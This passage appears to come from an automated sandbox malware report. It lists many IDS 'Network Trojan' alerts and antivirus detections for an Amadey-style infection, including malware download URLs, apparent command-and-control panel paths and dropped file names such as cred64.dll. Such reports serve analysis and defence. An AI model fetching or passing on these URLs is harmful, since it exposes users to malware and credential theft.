                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949991802027700 01/05/23-08:59:30.264210
                                SID:2027700
                                Source Port:49991
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350472802027700 01/05/23-09:00:34.033108
                                SID:2027700
                                Source Port:50472
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350574802027700 01/05/23-09:00:42.760004
                                SID:2027700
                                Source Port:50574
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950503802027700 01/05/23-09:00:36.803500
                                SID:2027700
                                Source Port:50503
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350778802027700 01/05/23-09:01:03.570748
                                SID:2027700
                                Source Port:50778
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949790802027700 01/05/23-08:58:51.338614
                                SID:2027700
                                Source Port:49790
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950592802027700 01/05/23-09:00:43.979935
                                SID:2027700
                                Source Port:50592
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350311802027700 01/05/23-09:00:11.770616
                                SID:2027700
                                Source Port:50311
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949754802027700 01/05/23-08:58:37.863229
                                SID:2027700
                                Source Port:49754
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350133802027700 01/05/23-08:59:53.395514
                                SID:2027700
                                Source Port:50133
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.159.1850836802851115 01/05/23-09:01:30.114460
                                SID:2851115
                                Source Port:50836
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Attempted Administrator Privilege Gain
                                Timestamp:192.168.2.462.204.41.10949777802027700 01/05/23-08:58:47.535548
                                SID:2027700
                                Source Port:49777
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350538802027700 01/05/23-09:00:39.799573
                                SID:2027700
                                Source Port:50538
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950536802027700 01/05/23-09:00:39.437593
                                SID:2027700
                                Source Port:50536
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950628802027700 01/05/23-09:00:47.622929
                                SID:2027700
                                Source Port:50628
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950358802027700 01/05/23-09:00:19.577756
                                SID:2027700
                                Source Port:50358
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950190802027700 01/05/23-08:59:59.917333
                                SID:2027700
                                Source Port:50190
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350762802027700 01/05/23-09:01:02.403608
                                SID:2027700
                                Source Port:50762
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949767802027700 01/05/23-08:58:41.873803
                                SID:2027700
                                Source Port:49767
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950312802027700 01/05/23-09:00:11.973592
                                SID:2027700
                                Source Port:50312
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349931802027700 01/05/23-08:59:16.411802
                                SID:2027700
                                Source Port:49931
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950134802027700 01/05/23-08:59:53.519893
                                SID:2027700
                                Source Port:50134
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949764802027700 01/05/23-08:58:40.202978
                                SID:2027700
                                Source Port:49764
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349891802027700 01/05/23-08:59:11.233677
                                SID:2027700
                                Source Port:49891
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950394802027700 01/05/23-09:00:23.445580
                                SID:2027700
                                Source Port:50394
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950137802027700 01/05/23-08:59:53.835444
                                SID:2027700
                                Source Port:50137
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950783802027700 01/05/23-09:01:04.057520
                                SID:2027700
                                Source Port:50783
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350120802027700 01/05/23-08:59:52.031927
                                SID:2027700
                                Source Port:50120
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350798802027700 01/05/23-09:01:05.181687
                                SID:2027700
                                Source Port:50798
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950062802027700 01/05/23-08:59:45.186149
                                SID:2027700
                                Source Port:50062
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350660802027700 01/05/23-09:00:53.003102
                                SID:2027700
                                Source Port:50660
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350449802027700 01/05/23-09:00:28.961048
                                SID:2027700
                                Source Port:50449
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350663802027700 01/05/23-09:00:53.028470
                                SID:2027700
                                Source Port:50663
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350587802027700 01/05/23-09:00:43.983662
                                SID:2027700
                                Source Port:50587
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350818802027700 01/05/23-09:01:06.823327
                                SID:2027700
                                Source Port:50818
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350522802027700 01/05/23-09:00:38.198566
                                SID:2027700
                                Source Port:50522
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949840802027700 01/05/23-08:59:02.896850
                                SID:2027700
                                Source Port:49840
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350225802027700 01/05/23-09:00:03.459317
                                SID:2027700
                                Source Port:50225
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350693802027700 01/05/23-09:00:55.952321
                                SID:2027700
                                Source Port:50693
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350149802027700 01/05/23-08:59:54.664923
                                SID:2027700
                                Source Port:50149
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349944802027700 01/05/23-08:59:21.558029
                                SID:2027700
                                Source Port:49944
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350765802027700 01/05/23-09:01:02.547317
                                SID:2027700
                                Source Port:50765
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950773802027700 01/05/23-09:01:03.100108
                                SID:2027700
                                Source Port:50773
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350413802027700 01/05/23-09:00:25.294913
                                SID:2027700
                                Source Port:50413
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950421802027700 01/05/23-09:00:25.952060
                                SID:2027700
                                Source Port:50421
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350426802027700 01/05/23-09:00:26.560374
                                SID:2027700
                                Source Port:50426
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350502802027700 01/05/23-09:00:36.580372
                                SID:2027700
                                Source Port:50502
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350719802027700 01/05/23-09:00:58.200718
                                SID:2027700
                                Source Port:50719
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950249802027700 01/05/23-09:00:05.885679
                                SID:2027700
                                Source Port:50249
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350676802027700 01/05/23-09:00:54.155480
                                SID:2027700
                                Source Port:50676
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950427802027700 01/05/23-09:00:26.496027
                                SID:2027700
                                Source Port:50427
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349990802027700 01/05/23-08:59:30.202720
                                SID:2027700
                                Source Port:49990
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350057802027700 01/05/23-08:59:44.400427
                                SID:2027700
                                Source Port:50057
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350518802027700 01/05/23-09:00:37.898419
                                SID:2027700
                                Source Port:50518
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350512802027700 01/05/23-09:00:37.279985
                                SID:2027700
                                Source Port:50512
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350423802027700 01/05/23-09:00:26.171588
                                SID:2027700
                                Source Port:50423
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350607802027700 01/05/23-09:00:45.466559
                                SID:2027700
                                Source Port:50607
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949948802027700 01/05/23-08:59:22.544996
                                SID:2027700
                                Source Port:49948
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350334802027700 01/05/23-09:00:16.623152
                                SID:2027700
                                Source Port:50334
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950704802027700 01/05/23-09:00:56.768115
                                SID:2027700
                                Source Port:50704
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:62.204.41.109192.168.2.480497402838063 01/05/23-08:58:29.856205
                                SID:2838063
                                Source Port:80
                                Destination Port:49740
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350153802027700 01/05/23-08:59:55.394118
                                SID:2027700
                                Source Port:50153
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950348802027700 01/05/23-09:00:18.269120
                                SID:2027700
                                Source Port:50348
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350436802027700 01/05/23-09:00:27.455366
                                SID:2027700
                                Source Port:50436
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350130802027700 01/05/23-08:59:53.086407
                                SID:2027700
                                Source Port:50130
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350245802027700 01/05/23-09:00:05.396067
                                SID:2027700
                                Source Port:50245
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950763802027700 01/05/23-09:01:02.368945
                                SID:2027700
                                Source Port:50763
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950526802027700 01/05/23-09:00:38.476725
                                SID:2027700
                                Source Port:50526
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950674802027700 01/05/23-09:00:53.974376
                                SID:2027700
                                Source Port:50674
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350242802027700 01/05/23-09:00:05.262014
                                SID:2027700
                                Source Port:50242
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350156802027700 01/05/23-08:59:56.232806
                                SID:2027700
                                Source Port:50156
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350169802027700 01/05/23-08:59:58.253361
                                SID:2027700
                                Source Port:50169
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350703802027700 01/05/23-09:00:56.707698
                                SID:2027700
                                Source Port:50703
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350420802027700 01/05/23-09:00:26.068591
                                SID:2027700
                                Source Port:50420
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350788802027700 01/05/23-09:01:04.286381
                                SID:2027700
                                Source Port:50788
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350439802027700 01/05/23-09:00:27.717664
                                SID:2027700
                                Source Port:50439
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950055802027700 01/05/23-08:59:44.443723
                                SID:2027700
                                Source Port:50055
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950141802027700 01/05/23-08:59:54.090463
                                SID:2027700
                                Source Port:50141
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950493802027700 01/05/23-09:00:35.266739
                                SID:2027700
                                Source Port:50493
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350140802027700 01/05/23-08:59:54.155578
                                SID:2027700
                                Source Port:50140
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950582802027700 01/05/23-09:00:43.434887
                                SID:2027700
                                Source Port:50582
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350706802027700 01/05/23-09:00:56.921645
                                SID:2027700
                                Source Port:50706
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950230802027700 01/05/23-09:00:03.955738
                                SID:2027700
                                Source Port:50230
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350390802027700 01/05/23-09:00:23.045637
                                SID:2027700
                                Source Port:50390
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949849802027700 01/05/23-08:59:04.524670
                                SID:2027700
                                Source Port:49849
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949938802027700 01/05/23-08:59:17.222073
                                SID:2027700
                                Source Port:49938
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950671802027700 01/05/23-09:00:53.721447
                                SID:2027700
                                Source Port:50671
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350410802027700 01/05/23-09:00:24.986182
                                SID:2027700
                                Source Port:50410
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350581802027700 01/05/23-09:00:43.472973
                                SID:2027700
                                Source Port:50581
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950760802027700 01/05/23-09:01:02.117282
                                SID:2027700
                                Source Port:50760
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349934802027700 01/05/23-08:59:16.668938
                                SID:2027700
                                Source Port:49934
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350054802027700 01/05/23-08:59:44.171627
                                SID:2027700
                                Source Port:50054
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950707802027700 01/05/23-09:00:57.044379
                                SID:2027700
                                Source Port:50707
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950500802027700 01/05/23-09:00:36.283421
                                SID:2027700
                                Source Port:50500
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349848802027700 01/05/23-08:59:04.429913
                                SID:2027700
                                Source Port:49848
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950789802027700 01/05/23-09:01:04.382319
                                SID:2027700
                                Source Port:50789
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350492802027700 01/05/23-09:00:35.167092
                                SID:2027700
                                Source Port:50492
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350604802027700 01/05/23-09:00:45.256809
                                SID:2027700
                                Source Port:50604
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:82.115.223.15192.168.2.415486505752850353 01/05/23-09:00:55.252560
                                SID:2850353
                                Source Port:15486
                                Destination Port:50575
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350686802027700 01/05/23-09:00:55.257034
                                SID:2027700
                                Source Port:50686
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350699802027700 01/05/23-09:00:56.455009
                                SID:2027700
                                Source Port:50699
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350159802027700 01/05/23-08:59:57.268240
                                SID:2027700
                                Source Port:50159
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949935802027700 01/05/23-08:59:16.871314
                                SID:2027700
                                Source Port:49935
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350248802027700 01/05/23-09:00:05.629233
                                SID:2027700
                                Source Port:50248
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350670802027700 01/05/23-09:00:53.596368
                                SID:2027700
                                Source Port:50670
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349921802027700 01/05/23-08:59:14.725675
                                SID:2027700
                                Source Port:49921
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: http://62.204.41.145/fusa/bibar.exeURL Reputation: Label: malware
                                Source: http://aaa.apiaaaeg.com/check/?sid=166043&key=e3278a7eba82b3b135f8b31f0f4dd607Avira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Nmkn5d9Dn/index.php001Avira URL Cloud: Label: malware
                                Source: http://aaa.apiaaaeg.com/check/?sid=165901&key=a41443f67962d5190dc1aed0662d1137Avira URL Cloud: Label: malware
                                Source: http://aaa.apiaaaeg.com/check/?sid=165869&key=af816f132e2c5b454b5e2c119810721cAvira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Nmkn5d9Dn/index.phpAvira URL Cloud: Label: malware
                                Source: 45.32.200.113/mBsjv2swweP/index.phpAvira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Avira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Nmkn5d9Dn/index.phpqAvira URL Cloud: Label: malware
                                Source: https://lazydowns.com/llpb1135a.exeAvira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Nmkn5d9Dn/index.phptAvira URL Cloud: Label: malware
                                Source: http://aaa.apiaaaeg.com/check/?sid=165709&key=e0b538157820667532fc0838e561b022Avira URL Cloud: Label: malware
                                Source: http://45.66.230.123/Legno.exe#Avira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Nmkn5d9Dn/index.phpncodeoAvira URL Cloud: Label: malware
                                Source: http://45.32.200.113/m/Nmkn5d9Dn/index.phpfAvira URL Cloud: Label: malware
                                Source: http://194.135.33.28/baiden.exeAvira URL Cloud: Label: malware
                                Source: http://62.204.41.109/Nmkn5d9Dn/index.phpUsersAvira URL Cloud: Label: malware
                                Source: http://45.32.200.113/mBsjv2swweP/index.phpAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeAvira: detection malicious, Label: HEUR/AGEN.1234969
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeAvira: detection malicious, Label: HEUR/AGEN.1234969
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeAvira: detection malicious, Label: HEUR/AGEN.1223914
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeAvira: detection malicious, Label: HEUR/AGEN.1223914
                                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeAvira: detection malicious, Label: HEUR/AGEN.1223914
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                                Source: C:\Users\user\AppData\Local\Temp\Amadey.exeAvira: detection malicious, Label: HEUR/AGEN.1223914
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                                Source: Ej3vSx3p8Y.exeReversingLabs: Detection: 69%
                                Source: Ej3vSx3p8Y.exeVirustotal: Detection: 52%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exeReversingLabs: Detection: 69%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dllReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeReversingLabs: Detection: 69%
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\3320.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeReversingLabs: Detection: 69%
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeReversingLabs: Detection: 50%
                                Source: C:\Users\user\AppData\Local\Temp\7E5F.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Temp\Amadey.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Local\Temp\llpb1135.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dllReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Roaming\fgifwjuReversingLabs: Detection: 69%
                                Source: C:\Users\user\AppData\Roaming\vhifwjuReversingLabs: Detection: 50%
                                Source: Ej3vSx3p8Y.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\3320.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\llpb1135.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\7E5F.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\4477.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\fgifwjuJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\Amadey.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeJoe Sandbox ML: detected
